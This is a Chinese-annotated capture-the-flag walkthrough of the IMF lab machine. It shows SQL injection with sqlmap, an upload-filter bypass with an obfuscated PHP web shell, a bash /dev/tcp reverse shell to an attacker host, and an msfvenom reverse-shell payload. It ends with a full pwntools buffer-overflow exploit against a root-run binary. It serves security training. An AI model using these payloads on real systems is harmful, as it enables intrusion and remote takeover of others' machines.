信息收集
| IP Address | Opening Ports |
|---|---|
| 192.168.8.103 | TCP:80 |
$ nmap -p- 192.168.8.103 --min-rate 1000 -sC -sV
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-title: IMF - Homepage
|_http-server-header: Apache/2.4.18 (Ubuntu)
Flag 1
http://192.168.8.103/contact.php
flag1{YWxsdGhlZmlsZXM=}
Flag 2
拼接几个文件名
$ echo 'ZmxhZzJ7YVcxbVlXUnRhVzVwYzNSeVlYUnZjZz09fQ=='|base64 -d
flag2{aW1mYWRtaW5pc3RyYXRvcg==}
Flag 3
$ echo 'aW1mYWRtaW5pc3RyYXRvcg=='|base64 -d
解密:imfadministrator
http://192.168.8.103/imfadministrator/
user=rmichaels&pass[]=123
flag3{Y29udGludWVUT2Ntcw==}
Flag 4
$ sqlmap -u "http://192.168.8.103/imfadministrator/cms.php?pagename=home" --cookie "PHPSESSID=mtcagv7kevus11r651k0ekor65" -D admin -T pages --dump-all --batch
flag4{dXBsb2Fkcjk0Mi5waHA=}
Flag 5
$ echo "dXBsb2Fkcjk0Mi5waHA="|base64 -d
http://192.168.8.103/imfadministrator/uploadr942.php
Bypass 1
在请求体内添加GIF8;并且使用十六进制编码绕过WAF过滤system关键字
GIF8;
<?php
"\x73\79\x73\x74\x65\x6d"($_GET['cmd']);
?>
Bypass 2
$ echo 'FFD8FFEo' | xxd -r -p > test.gif
$ echo '<?php echo `id`; ?>' >> test.gif
GIF8;
<?php
echo `/bin/bash -c 'bash -i >& /dev/tcp/192.168.8.107/10032 0>&1'`;
?>
www-data@imf:/var/www/html/imfadministrator/uploads$ cat flag5_abc123def.txt
flag5{YWdlbnRzZXJ2aWNlcw==}
Flag 6
(Kali)$ ./chisel server -p 8888 --reverse
(tmp)$ ./chisel client 192.168.8.107:8888 R:7788:localhost:7788 &
(tmp)$ ./pspy32
当我们每次输入Agent ID后,会自动以ROOT权限启动一个agent进程
搜索相关agent命令
www-data@imf:/var/www/html/imfadministrator/uploads$ find / -name agent 2>/tmp/res
通过分析发现进入循环的条件是ID等于0x2ddd984(48093572)
report函数中的gets函数存在缓冲区溢出
GDB-Peda & BOF
$ git clone https://github.com/longld/peda.git ~/peda
$ echo "source ~/peda/peda.py">>~/.gdbinit
$ gdb -q ./agents
gdb-peda$ pattern_create 2000
gdb-peda$ pattern_offset 0x74414156
偏移量168
检查二进制文件上启用了哪些安全性
gdb-peda$ checksec
CANARY : disabled
栈保护机制(Stack Canary)没有启用。栈保护是通过在栈帧中插入一个“金丝雀”(canary)值来检测缓冲区溢出攻击,如果金丝雀值被改变,程序会检测到溢出并终止FORTIFY : disabled
编译时没有启用 _FORTIFY_SOURCE,这是一个用于在编译和运行时增加内存函数安全检查的机制,例如 strcpy 和 memcpyNX : disabled
没有启用可执行空间保护(Non-Executable, NX)。NX 位用于标记内存区域为不可执行,以防止代码执行在这些区域(如栈或堆)PIE : disabled
没有启用位置无关可执行(Position Independent Executable, PIE)。PIE 使得可执行文件在每次加载时都随机化其内存地址,从而增加攻击难度RELRO : Partial
启用了部分的重定位只读(Relocation Read-Only, RELRO)。Partial RELRO 将 .got 部分设置为只读,以防止修改全局偏移表(GOT)
将二进制文件上传,分析获取call地址
http://ropshell.com/ropsearch?h=fabc1afd43f668df0b812213567d032c
在缓冲区168范围内写入ShellCode,通过覆盖EIP值跳转到Call eax(0x08048563)的地址,执行ShellCode。
使用 msfvenom 生成shellcode,要求它避免空字符和换行符。
$ msfvenom -p linux/x86/shell_reverse_tcp LHOST=192.168.8.107 LPORT=10034 -f python -b "\x00\x0a\x0d"
利用脚本
# By Maptnh
import argparse
from pwn import *
parser = argparse.ArgumentParser(description='Exploit script using pwntools.')
parser.add_argument('-rhost', required=True, help='Remote host IP address')
parser.add_argument('-rport', type=int, required=True, help='Remote host port')
parser.add_argument('-lport', type=int, required=True, help='Local port to listen on')
args = parser.parse_args()
ip = args.rhost
port = args.rport
local_port = args.lport
client = remote(ip, port)
initial_response = client.recv(512).decode()
# Convert strings to bytes before sending
client.sendline(b"48093572")
response1 = client.recv(512).decode()
client.sendline(b"3")
shellcode = (
b"\xbe\xd7\x72\xc5\xb1\xd9\xeb\xd9\x74\x24\xf4\x58\x2b"
b"\xc9\xb1\x12\x31\x70\x12\x03\x70\x12\x83\x17\x76\x27"
b"\x44\xa6\xac\x50\x44\x9b\x11\xcc\xe1\x19\x1f\x13\x45"
b"\x7b\xd2\x54\x35\xda\x5c\x6b\xf7\x5c\xd5\xed\xfe\x34"
b"\x26\xa5\x09\xaf\xce\xb4\x09\x08\x3d\x30\xe8\xe6\x27"
b"\x12\xba\x55\x1b\x91\xb5\xb8\x96\x16\x97\x52\x47\x38"
b"\x6b\xca\xff\x69\xa4\x68\x69\xff\x59\x3e\x3a\x76\x7c"
b"\x0e\xb7\x45\xff"
)
padding = b"A" * (168 - len(shellcode))
call_eax_gadget = b"\x63\x85\x04\x08\n"
payload = shellcode + padding + call_eax_gadget
listener = listen(local_port)
client.send(payload)
listener.wait_for_connection()
listener.interactive()
$ python3 exp.py -rhost 127.0.0.1 -rport 7788 -lport 10034
flag6{R2gwc3RQcm90MGMwbHM=}
